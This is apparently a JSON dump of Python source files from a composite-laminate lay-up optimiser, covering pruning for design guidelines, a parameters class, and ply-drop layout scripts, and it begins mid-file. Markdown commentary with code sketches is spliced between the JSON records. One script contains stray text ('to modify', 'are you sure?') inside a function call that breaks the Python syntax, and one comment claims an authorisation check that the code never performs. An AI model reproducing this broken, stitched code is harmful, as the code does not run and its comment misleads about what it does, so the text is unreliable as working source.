constraints)\r\n\r\n    penalty_bal_ipo = max(penalty_ipo_pc, penalty_ipo_lampam)\r\n\r\n#    print('obj_no_const', obj_no_const)\r\n#    print('penalty_10', penalty_10)\r\n#    print('penalty_ipo_lampam', penalty_ipo_lampam)\r\n#    print('penalty_ipo_pc', penalty_ipo_pc)\r\n#    print('penalty_oopo', penalty_oopo)\r\n\r\n    # calculation of the bounds\r\n    outer_step_result.obj_const = calc_obj_multi_ss(\r\n        objective=obj_no_const,\r\n        penalty_10=penalty_10,\r\n        penalty_bal_ipo=penalty_bal_ipo,\r\n        penalty_oopo=penalty_oopo,\r\n        coeff_10=parameters.coeff_10,\r\n        coeff_bal_ipo=parameters.coeff_bal_ipo,\r\n        coeff_oopo=parameters.coeff_oopo)\r\n\r\n    # if repair failed\r\n    if ((constraints.rule_10_percent and penalty_10)\\\r\n        or (constraints.ipo and penalty_ipo_lampam \\\r\n            and constraints.penalty_ipo_switch) \\\r\n        or (constraints.ipo and penalty_ipo_pc \\\r\n            and constraints.penalty_bal_switch)):\r\n        outer_step_result.obj_const = 1e10\r\n\r\n#    print('outer_step_result.ss_best', result.ss_best)\r\n#    print('outer_step_result.lampam_best', outer_step_result.lampam_best)\r\n#    print('outer_step_result.obj_const', outer_step_result.obj_const)\r\n\r\n    return outer_step_result\r\n\r\nclass OuterStepResults():\r\n    \" An object for storing the results of an outer step in LAYLA\"\r\n    def __init__(self):\r\n        \"Initialise the results of an outer 
step in LAYLA\"\r\n # solution stacking sequence\r\n self.ss_best = None\r\n # solution lamination parameters\r\n self.lampam_best = None\r\n # solution ply counts in each fibre direction\r\n self.ply_counts = None\r\n # solution constrained objective function\r\n self.obj_const = None\r\n# # number of objective function calls during outer step\r\n# self.n_obj_func_calls = 0\r\n # number of nodes at the last level of the search tree\r\n self.n_designs_last_level = 0\r\n # number of repaired nodes\r\n self.n_designs_repaired = 0\r\n # number of unique repaired nodes\r\n self.n_designs_repaired_unique = 0\r\n"
},
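The ply-count bookkeeping after the final beam-search call above is a plain histogram over the admissible fibre directions, keyed through `constraints.ind_angles_dict`. A self-contained sketch of that step, with an ordinary dict standing in for the `Constraints` object:

```python
import numpy as np

# map each admissible angle to its slot in n_plies_per_angle
set_of_angles = [0, 45, -45, 90]
ind_angles_dict = {angle: ind for ind, angle in enumerate(set_of_angles)}

ss_best = np.array([45, 0, -45, 90, -45, 0, 45])
n_plies_per_angle = np.zeros(len(set_of_angles))
for ply in ss_best:
    n_plies_per_angle[ind_angles_dict[int(ply)]] += 1
print(n_plies_per_angle)  # [2. 2. 2. 1.]
```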
{
"alpha_fraction": 0.42608603835105896,
"alphanum_fraction": 0.4359056353569031,
"avg_line_length": 40.98624038696289,
"blob_id": "e0822178ef41c7c83b141b5353bc666ad908840a",
"content_id": "b55f88d37089b3e98915247c6837b13bb8d40d4e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9369,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 218,
"path": "/src/BELLA/pruning.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nPruning during guide laminate lay-up optimisation\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.guidelines.external_contig import external_contig\r\nfrom src.guidelines.internal_contig import internal_contig2\r\nfrom src.guidelines.disorientation import is_diso\r\n\r\ndef pruning_diso_contig_damtol(\r\n child_ss,\r\n mother_ss_bot,\r\n level,\r\n n_plies_to_optimise,\r\n constraints,\r\n mother_ss_top=None,\r\n has_middle_ply=False):\r\n '''\r\n performs the pruning for disorientation, damage tolerance and contiguity\r\n design guidelines during ply orientation optimisation\r\n\r\n INPUTS:\r\n\r\n - child_ss: possible fibre orientations for the new ply\r\n - level: level in the beam search tree\r\n - constraints: set of design guidelines\r\n - n_plies_to_optimise: number of plies to optimise during BELLA step 2\r\n - mother_ss_bot: beginning of the partial lay-up of the ply group being\r\n optimised\r\n - mother_ss_bot: end of the partial lay-up of the ply group being optimised\r\n design\r\n - has_middle_ply: True if one panel at least has a middle ply\r\n '''\r\n # =========================================================================\r\n # pruning for middle ply symmetry\r\n # =========================================================================\r\n if constraints.sym and level == n_plies_to_optimise - 1 and has_middle_ply:\r\n child_ss = np.array([0, 90], int)\r\n\r\n # =========================================================================\r\n # pruning for damage tolerance\r\n # =========================================================================\r\n my_set = set([45, -45])\r\n\r\n if constraints.dam_tol:\r\n\r\n if level == 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n elif not constraints.sym and level == n_plies_to_optimise - 1:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n if constraints.dam_tol_rule in [2, 3]:\r\n\r\n if level == 1:\r\n\r\n if constraints.dam_tol_rule == 2:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] != - mother_ss_bot[0]:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n elif constraints.dam_tol_rule == 3:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n # diso\r\n if constraints.diso \\\r\n and not is_diso(-45, 45, constraints.delta_angle):\r\n if child_ss[ind] != - mother_ss_bot[0]:\r\n child_ss = np.delete(\r\n child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n if level == n_plies_to_optimise - 2 and not constraints.sym:\r\n\r\n if constraints.dam_tol_rule == 2:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] != - mother_ss_top[-1]:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n elif constraints.dam_tol_rule == 3:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n # diso\r\n if 
constraints.diso \\\r\n and not is_diso(-45, 45, constraints.delta_angle):\r\n if child_ss[ind] != - mother_ss_top[-1]:\r\n child_ss = np.delete(\r\n child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n # =========================================================================\r\n # pruning for disorientation\r\n # =========================================================================\r\n if constraints.diso:\r\n if constraints.sym or level % 2 == 0: # plies at bottom part\r\n # externally with mother_ss_bot\r\n if mother_ss_bot.size > 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_bot[-1],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n else: # asymetric laminate top part\r\n # externally with mother_ss_top\r\n if mother_ss_top.size > 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_top[0],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n if not constraints.sym and level == n_plies_to_optimise - 1:\r\n # last ply asymmetric laminates\r\n if level % 2 == 1: # top part\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_bot[-1],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n else: # bottom part\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_top[0],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n # =========================================================================\r\n # pruning for the contiguity constraint\r\n # =========================================================================\r\n if constraints.contig:\r\n\r\n # not last ply\r\n if not level == n_plies_to_optimise - 1:\r\n\r\n # general case\r\n if constraints.sym or level % 2 == 0: # bottom ply\r\n\r\n for ind in range(child_ss.size)[:: -1]:\r\n # externally with mother_ss_bot\r\n test, _ = external_contig(\r\n angle=np.array((child_ss[ind],)),\r\n n_plies_group=1,\r\n constraints=constraints,\r\n ss_before=mother_ss_bot)\r\n if test.size == 0:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n\r\n\r\n # last ply\r\n else:\r\n\r\n # symmetric laminate with no middle ply\r\n if constraints.sym and not has_middle_ply:\r\n ss_before = mother_ss_bot[\r\n mother_ss_bot.size - constraints.n_contig:]\r\n for ind in range(child_ss.size)[:: -1]:\r\n new_stack = np.hstack((\r\n ss_before,\r\n child_ss[ind],\r\n child_ss[ind],\r\n np.flip(ss_before, axis=0)))\r\n if not internal_contig2(new_stack, constraints):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n # symmetric laminate with middle ply\r\n elif constraints.sym and has_middle_ply:\r\n ss_before = mother_ss_bot[\r\n mother_ss_bot.size - constraints.n_contig:]\r\n for ind in range(child_ss.size)[:: -1]:\r\n new_stack = np.hstack((\r\n ss_before,\r\n child_ss[ind],\r\n np.flip(ss_before, axis=0)))\r\n if not internal_contig2(new_stack, constraints):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n else: # not symmetric\r\n ss_before = mother_ss_bot[\r\n mother_ss_bot.size - constraints.n_contig:]\r\n ss_after = mother_ss_top[:constraints.n_contig]\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not internal_contig2(\r\n new_stack=np.hstack((\r\n ss_before, child_ss[ind], ss_after)),\r\n 
constraints=constraints):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n\r\n return child_ss"
},
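Most of the branches in `pruning_diso_contig_damtol` reduce to calls to `is_diso`, which rejects a candidate ply whose orientation differs from its neighbour's by more than `delta_angle`. A stand-in sketch of such a check, folding the difference into [0°, 90°] since fibre orientations are equivalent modulo 180° (an assumed detail; the repository's `is_diso` may differ):

```python
def is_diso_sketch(angle1, angle2, delta_angle):
    """True if two ply orientations differ by at most delta_angle degrees."""
    diff = abs(angle1 - angle2) % 180
    diff = min(diff, 180 - diff)  # orientations are direction-less
    return diff <= delta_angle

print(is_diso_sketch(45, -45, 45))  # False: 90 degrees apart
print(is_diso_sketch(90, -45, 45))  # True: 45 degrees apart
```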
{
"alpha_fraction": 0.540989875793457,
"alphanum_fraction": 0.5549398064613342,
"avg_line_length": 30.30246925354004,
"blob_id": "9409abe144902330c3b31866ec74476555b8c903",
"content_id": "078f1147a0d46e38a8b95ad781d54b553ecc5668",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5233,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 162,
"path": "/src/BELLA/pdls_in_excel.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script generates input ply drop layouts\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pandas as pd\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.divide_panels import divide_panels\r\nfrom src.BELLA.pdl_ini import create_initial_pdls\r\nfrom src.divers.excel import autofit_column_widths\r\nfrom src.divers.excel import delete_file\r\nfrom src.divers.excel import append_df_to_excel\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_parameters_BELLA\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\n#from src.guidelines.one_stack import check_ply_drop_rules\r\n\r\n# Number of initial ply drops to be tested\r\nn_ini_ply_drops = 6\r\nfilename = 'pdls_ini_6_panels_5_boundaries.xlsx'\r\nfilename = 'pdls_ini_6_panels_9_boundaries.xlsx'\r\ndelete_file(filename)\r\n#==============================================================================\r\n# Targets and panel geometries\r\n#==============================================================================\r\n# panel number of plies\r\nn_plies = [60, 56, 52, 48, 44, 40]\r\n# number of panels\r\nn_panels = len(n_plies)\r\n# panel IDs\r\nID = list(range(1, n_panels + 1))\r\n# panels adjacency\r\n# panels adjacency\r\nneighbour_panels = {1:[2],\r\n 2:[1, 3],\r\n 3:[2, 4],\r\n 4:[3, 5],\r\n 5:[4, 6],\r\n 6:[5]}\r\nneighbour_panels = {1:[2, 3],\r\n 2:[1, 3, 4],\r\n 3:[2, 4, 1, 5],\r\n 4:[3, 5, 2, 6],\r\n 5:[3, 4, 6],\r\n 6:[5, 4]}\r\n#==============================================================================\r\n# Design guidelines\r\n#==============================================================================\r\n# symmetry\r\nsym = True\r\n\r\n# damage tolerance\r\ndam_tol = True\r\n\r\n# covering\r\ncovering = False\r\n\r\n# ply drop spacing\r\npdl_spacing = True\r\n# Minimum number of continuous plies required between two blocks of dropped\r\n# plies\r\nmin_drop = 5\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n dam_tol=dam_tol,\r\n covering=covering,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n\r\n\r\n********* to modify *********\r\n\r\nobj_func_param = ObjFunction(constraints)\r\n\r\n\r\n\r\n#==============================================================================\r\n# Optimiser Parameters\r\n#==============================================================================\r\n# Minimum ply count for ply groups during ply drop layout generation\r\ngroup_size_min = 8\r\n# Desired ply count for ply groups during ply drop layout generation\r\ngroup_size_max = 12\r\n\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\n# Time limit to create a group ply-drop layout\r\ntime_limit_group_pdl = 1\r\n# Time limit to create a ply-drop layout\r\ntime_limit_all_pdls = 100\r\n\r\n# DO NOT DELETE\r\nparameters = Parameters(\r\n constraints=constraints,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n n_ini_ply_drops=n_ini_ply_drops,\r\n coeff_spacing=coeff_spacing,\r\n time_limit_group_pdl=time_limit_group_pdl,\r\n time_limit_all_pdls=time_limit_all_pdls)\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n 
n_plies=n_plies[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n#print(panels[0])\r\n\r\nmultipanel = MultiPanel(panels)\r\n#print(multipanel)\r\n\r\n#==============================================================================\r\n# Ply drop layouts generartion\r\n#==============================================================================\r\ndivide_panels(multipanel, parameters, constraints)\r\npdls = create_initial_pdls(multipanel, constraints, parameters, obj_func_param)\r\n\r\nsave_constraints_BELLA(filename, constraints)\r\nsave_parameters_BELLA(filename, parameters)\r\n\r\nfor ind_pdl, pdl in enumerate(pdls):\r\n table_pdl = pd.DataFrame()\r\n for ind_row, pdl_row in enumerate(pdl):\r\n for ind_elem, elem in enumerate(pdl_row):\r\n table_pdl.loc[ind_row, str(ind_elem)] = elem\r\n append_df_to_excel(\r\n filename, table_pdl, 'pdl' + str(ind_pdl+1), index=False, header=False)\r\nautofit_column_widths(filename)\r\n\r\n#==============================================================================\r\n# Save ply drop penalties\r\n#==============================================================================\r\ntable_penalties = pd.DataFrame()\r\nfor ind_pdl, pdl in enumerate(pdls):\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=pdl,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=True\r\n\r\n **are you sure?)\r\n\r\n table_penalties.loc[ind_pdl, 'penalty_spacing'] = penalty_spacing\r\n table_penalties.loc[ind_pdl, 'min_drop'] = constraints.min_drop\r\n\r\nappend_df_to_excel(\r\n filename, table_penalties, 'penalties', index=True, header=True)\r\nautofit_column_widths(filename)\r\n"
},
{
"alpha_fraction": 0.61297607421875,
"alphanum_fraction": 0.6263250708580017,
"avg_line_length": 37.18461608886719,
"blob_id": "8a9ceb7880a164ad54d72b8e6814d464dbda0298",
"content_id": "e3e46b1a9b2e94e1a032c2497e7d9fc2bde668fe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10188,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 260,
"path": "/src/BELLA/parameters.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for the parameters of the optimiser\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n\r\nclass Parameters():\r\n \" An object for storing the optimiser parameters \"\r\n\r\n def __init__(\r\n self,\r\n constraints,\r\n group_size_min=4,\r\n group_size_max=12,\r\n global_node_limit=100,\r\n local_node_limit=100,\r\n local_node_limit_final=1,\r\n global_node_limit_final=5,\r\n global_node_limit2=10,\r\n local_node_limit2=10,\r\n global_node_limit3=10,\r\n local_node_limit3=10,\r\n n_ini_ply_drops=5,\r\n p_A=100,\r\n n_D1=6,\r\n n_D2=10,\r\n n_D3=1,\r\n repair_membrane_switch=True,\r\n repair_flexural_switch=True,\r\n n_plies_ref_panel=1000,\r\n save_success_rate=False,\r\n time_limit_group_pdl=1,\r\n time_limit_all_pdls=100,\r\n save_buckling=False):\r\n \" Create a set of parameters for BELLA\"\r\n\r\n self.save_buckling = save_buckling\r\n\r\n ### BELLA step 2\r\n\r\n # size of the ply groups during BELLA step 2\r\n # desired group size for smaller groups\r\n self.group_size_min = np.around(group_size_min)\r\n if not isinstance(group_size_min, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, group_size_min must be an integer!\"\"\")\r\n if group_size_min < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, group_size_min must be strictly positive!\"\"\")\r\n # maximum group size\r\n if not isinstance(group_size_max, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, group_size_max must be an integer!\"\"\")\r\n self.group_size_max = group_size_max\r\n if group_size_min > group_size_max:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, group_size_min must smaller than group_size_max!\"\"\")\r\n\r\n # Time limit to create a group ply-drop layout\r\n self.time_limit_group_pdl = time_limit_group_pdl\r\n # Time limit to create a ply-drop layout\r\n self.time_limit_all_pdls = time_limit_all_pdls\r\n\r\n # Number of initial ply drops to be tested\r\n self.n_ini_ply_drops = np.around(n_ini_ply_drops)\r\n if not isinstance(n_ini_ply_drops, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_ini_ply_drops must be an integer!\"\"\")\r\n if n_ini_ply_drops < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_ini_ply_drops must be strictly positive!\"\"\")\r\n\r\n\r\n ### BELLA step 3\r\n\r\n # Branching limits for global pruning during BELLA step 3\r\n self.global_node_limit = np.around(global_node_limit)\r\n if not isinstance(global_node_limit, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit must be an integer!\"\"\")\r\n if global_node_limit < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit must be strictly positive!\"\"\")\r\n self.global_node_limit_final = np.around(global_node_limit_final)\r\n if not isinstance(global_node_limit_final, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit_final must be an integer!\"\"\")\r\n if global_node_limit_final < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit_final must be strictly positive!\"\"\")\r\n self.local_node_limit = np.around(local_node_limit)\r\n if not isinstance(local_node_limit, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit must be an integer!\"\"\")\r\n if local_node_limit < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit must be strictly positive!\"\"\")\r\n self.local_node_limit_final = 
np.around(\r\n local_node_limit_final)\r\n if not isinstance(local_node_limit_final, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit_final must be an integer!\"\"\")\r\n if local_node_limit_final < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit_final must be strictly positive!\"\"\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n ### BELLA step 4.1\r\n\r\n ### Thickness of the reference panels\r\n if isinstance(n_plies_ref_panel, (int, float)):\r\n self.n_plies_ref_panel = n_plies_ref_panel\r\n else:\r\n raise ParametersDefinitionError(\"\"\"\r\nThe ply count of the reference panels must be a number!\"\"\")\r\n\r\n # repair to improve the convergence of in-plane lamination parameters\r\n # and of out-of-plane lamination parameters\r\n self.repair_membrane_switch = repair_membrane_switch\r\n if not isinstance(repair_membrane_switch, bool):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, repair_membrane_switch should be a boolean value!\"\"\")\r\n self.repair_flexural_switch = repair_flexural_switch\r\n if not isinstance(repair_flexural_switch, bool):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, repair_flexural_switch should be a boolean value!\"\"\")\r\n\r\n self.save_success_rate = save_success_rate\r\n\r\n # coefficient for the proportion of the laminate thickness that can be\r\n # modified during the refinement for membrane properties in the repair\r\n # process\r\n self.p_A = p_A\r\n if not isinstance(p_A, (float, int)):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, p_A should have a numeric value!\"\"\")\r\n if not (0 <= p_A <= 100):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, p_A must be between 0 and 100!\"\"\")\r\n\r\n # n_D1: number of plies in the last permutation\r\n # during repair for disorientation and/or contiguity\r\n self.n_D1 = n_D1\r\n if not isinstance(n_D1, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_D1 must be an integer!\"\"\")\r\n\r\n # n_D2: number of ply shifts tested at each step of the\r\n # re-designing process during refinement of flexural properties\r\n self.n_D2 = n_D2\r\n if not isinstance(n_D2, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_D2 must be an integer!\"\"\")\r\n\r\n # n_D3: number of times the algorithms 1 and 2 are repeated during the\r\n # flexural property refinement\r\n self.n_D3 = n_D3\r\n if not isinstance(n_D3, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, n_D2 must be an integer!\"\"\")\r\n\r\n\r\n ### BELLA step 4.2\r\n\r\n # Branching limits for global pruning during BELLA step 4.2\r\n self.global_node_limit2 = np.around(global_node_limit2)\r\n if not isinstance(global_node_limit2, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit2 must be an integer!\"\"\")\r\n if global_node_limit2 < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit2 must be strictly positive!\"\"\")\r\n self.local_node_limit2 = np.around(local_node_limit2)\r\n if not isinstance(local_node_limit2, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit2 must be an integer!\"\"\")\r\n if local_node_limit2 < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit2 must be strictly positive!\"\"\")\r\n\r\n\r\n ### BELLA step 4.3\r\n\r\n # Branching limits for global pruning during BELLA step 4.3\r\n self.global_node_limit3 = np.around(global_node_limit3)\r\n if not isinstance(global_node_limit3, int):\r\n raise 
ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit3 must be an integer!\"\"\")\r\n if global_node_limit3 < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, global_node_limit3 must be strictly positive!\"\"\")\r\n self.local_node_limit3 = np.around(local_node_limit3)\r\n if not isinstance(local_node_limit3, int):\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit3 must be an integer!\"\"\")\r\n if local_node_limit3 < 1:\r\n raise ParametersDefinitionError(\"\"\"\r\nAttention, local_node_limit3 must be strictly positive!\"\"\")\r\n\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f\"\"\"\r\nParameters of BELLA step 2:\r\n Number of initial ply drops to be tested: {self.n_ini_ply_drops}\r\n Minimum size for the ply groups: {self.group_size_min}\r\n Maximum size for the ply groups: {self.group_size_max}\r\n Time limit to generate pdl at each group search: {self.time_limit_group_pdl}\r\n Time limit to generate all initial pdls: {self.time_limit_all_pdls}\r\n\r\nParameters of BELLA step 3:\r\n Branching limits during beam search:\r\n - for global pruning: {self.global_node_limit}\r\n - for local pruning: {self.local_node_limit}\r\n - for global pruning at the last level: {self.global_node_limit_final}\r\n - for local pruning at the last level: {self.local_node_limit_final}\r\n\r\nParameters of BELLA step 4.1:\r\n Input number of plies in reference panel: {self.n_plies_ref_panel}\r\n Repair for in-plane lamination parameter convergence: {self.repair_membrane_switch}\r\n Repair for out-of-plane lamination parameter convergence: {self.repair_flexural_switch}\r\n p_A: {self.p_A}%\r\n n_D1: {self.n_D1}\r\n n_D2: {self.n_D2}\r\n n_D3: {self.n_D3}\r\n\r\nParameters of BELLA step 4.2:\r\n Branching limits during beam search:\r\n - for global pruning: {self.global_node_limit2}\r\n - for local pruning: {self.local_node_limit2}\r\n\r\nParameters of BELLA step 4.3:\r\n Branching limits during beam search:\r\n - for global pruning: {self.global_node_limit3}\r\n - for local pruning: {self.local_node_limit3}\r\n\"\"\"\r\n\r\nclass ParametersDefinitionError(Exception):\r\n \"\"\" Error during parameter definition\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n from src.BELLA.constraints import Constraints\r\n constraints = Constraints(sym=True)\r\n constraints.bal = True\r\n constraints.oopo = True\r\n parameters = Parameters(\r\n constraints=constraints)\r\n print(parameters)\r\n"
},
{
"alpha_fraction": 0.5945913791656494,
"alphanum_fraction": 0.6461974382400513,
"avg_line_length": 32.01606369018555,
"blob_id": "0e246104102191087eca8616450a7cc0c93b5fe9",
"content_id": "d7f61db9bded921a5002a982de781cc53d97be0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8468,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 249,
"path": "/input-files/create_input_file_SST.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script creates the iput files used for testing BELLA\r\n\"\"\"\r\n\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel\r\nfrom src.BELLA.save_set_up import save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\nfrom src.guidelines.one_stack import check_ply_drop_rules\r\nfrom src.divers.excel import delete_file, autofit_column_widths\r\n\r\nsheet = 'SST-40-60'\r\nsheet = 'SST-80-120'\r\nsheet = 'SST-120-180'\r\n\r\nfilename_input = '/BELLA/input-files/SST.xlsx'\r\nfilename_res = 'input_file_' + sheet + '.xlsx'\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename_res)\r\n\r\n# number of panels\r\nif sheet == 'SST-40-60': n_panels = 6\r\nelif sheet == 'SST-80-120': n_panels = 11\r\nelif sheet == 'SST-120-180': n_panels = 16\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n\r\n## lay-up rules\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\nset_of_angles = np.array([\r\n -45, 0, 45, 90, +30, -30, +60, -60, 15, -15, 75, -75], dtype=int)\r\n\r\nsym = True # symmetry rule\r\noopo = False # out-of-plane orthotropy requirements\r\n\r\nif constraints_set == 'C0':\r\n bal = False # balance rule\r\n rule_10_percent = False # 10% rule\r\n diso = False # disorientation rule\r\n contig = False # contiguity rule\r\n dam_tol = False # damage-tolerance rule\r\nelse:\r\n bal = True\r\n rule_10_percent = True\r\n diso = True\r\n contig = True\r\n dam_tol = True\r\n\r\nrule_10_Abdalla = True # 10% rule restricting LPs instead of ply percentages\r\npercent_Abdalla = 10 # percentage limit for the 10% rule applied on LPs\r\ncombine_45_135 = True # True if restriction on +-45 plies combined for 10% rule\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 =10 # percentage used in the 10% rule for +-45 deg plies\r\ndelta_angle = 45 # maximum angle difference for adjacent plies\r\nn_contig = 5 # maximum number of adjacent plies with the same fibre orientation\r\ndam_tol_rule = 1 # type of damage tolerance rule\r\n\r\n## ply-drop rules\r\n\r\ncovering = True # covering rule\r\nn_covering = 1 # number of plies ruled by covering 